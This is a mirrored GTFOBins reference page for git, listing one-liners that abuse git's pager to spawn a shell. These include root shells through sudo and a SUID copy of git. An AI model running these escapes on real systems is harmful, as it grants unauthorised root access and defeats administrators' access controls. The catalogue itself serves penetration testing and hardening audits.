This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-01 13:11:40 +01:00
Code
Issues
08f5b33651
GTFOBins.github.io
/
_gtfobins
/
git.md
Emilio
08f5b33651
Add functions with default pager in git
2019-03-31 11:03:34 +01:00
582 B
Raw
Blame
History
functions
shell
sudo
limited-suid
code
PAGER='sh -c "exec sh 0<&1"' git -p help
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
git -p help !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help
description
code
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
sudo git -p help !/bin/sh
code
PAGER='sh -c "exec sh 0<&1"' ./git -p help